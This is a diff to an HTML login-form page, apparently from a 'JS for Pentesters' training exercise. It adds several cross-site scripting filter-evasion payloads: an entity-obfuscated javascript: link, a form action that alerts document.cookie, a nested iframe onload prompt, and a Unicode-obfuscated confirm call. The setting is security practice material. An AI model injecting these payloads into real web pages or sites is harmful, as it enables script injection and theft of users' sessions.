--- a/form.html
+++ b/form.html
@@ -1,14 +1,16 @@
 <html>
 	<body>
 		<h1 id="demo">Welcome to JS for Pentesters</h1>  
-		
-		<form id="test" action="/authenticate" method="get">
+		<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
+		<form id="test" action="/Scripts" method="get">
 			Username: <input type="text" name="username" />
 			<br>
 			Password: <input type="password" name="pass" />
 			<input type="submit" value="submit"/>
 		</form>
-
+		//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
+		/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
+		<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
       	<script>
 		function InterceptForm () {
 			alert(document.forms["test"]["username"].value);
